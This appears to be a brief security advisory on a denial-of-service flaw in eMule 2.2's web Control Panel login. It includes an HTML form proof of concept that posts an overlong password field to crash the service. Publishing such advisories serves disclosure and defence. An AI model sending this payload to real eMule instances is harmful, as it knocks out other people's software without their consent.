|
|
| |
eMule is "a new filesharing client which is based on the eDonkey2000 network, but offers more features than the standard eDonkey client, because it's open source but under the restrictions of the GPL License".
A vulnerability in eMule's web based Control Panel allows remote attackers to cause a denial of service against the product. |
| |
Credit:
The information has been provided by The-Insider.
|
| |
Vulnerable systems:
* eMule version 2.2 [0.29c]
By posting a very long arbitrary password request to the "login" CGI, it is possible to cause a denial of service against eMule (NOTE: The Control Panel is not enabled by default).
Exploit:
Adding after this line:
< form action="" method="POST" name="login">
This:
< input type="password" name=p size=37 value="a[multiple 'a']a">
< input type="hidden" name=w value="password">
< br>
< br>
< input type=submit value="Login Now"></font>
</form>
Will allow you to trigger the bug.
|
|
|
|
|
